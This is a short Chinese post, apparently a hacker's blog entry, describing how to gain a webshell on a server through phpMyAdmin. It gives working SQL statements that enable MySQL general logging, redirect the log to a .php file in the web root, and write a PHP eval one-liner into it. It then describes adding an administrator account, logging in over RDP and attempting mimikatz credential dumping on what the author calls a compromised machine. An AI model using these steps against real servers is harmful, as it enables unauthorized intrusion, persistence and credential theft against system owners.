phpmyadmin getshell主要就三句话
//打开日志
set global general_log='on'
//设置日志路径
set global general_log_file='C:/websoft9/wampstack/apps/9panel/log.php'
//查询包含一句话的语句,写入
SELECT"<?php @eval($_REQUEST['a']);?>"
访问http://111.xx.xx.xx//9panel/log.php?a=phpinfo(); 也是成功输出 拿webshell管理工具一连 懒得写了,反正就是最后用小马新建了个用户,然后加入了Administrators组,3389远程桌面一连,本来想拿mimitatz抓administrator密码,但是windows server 2012抓不出来。很明显这是台肉鸡。
发表评论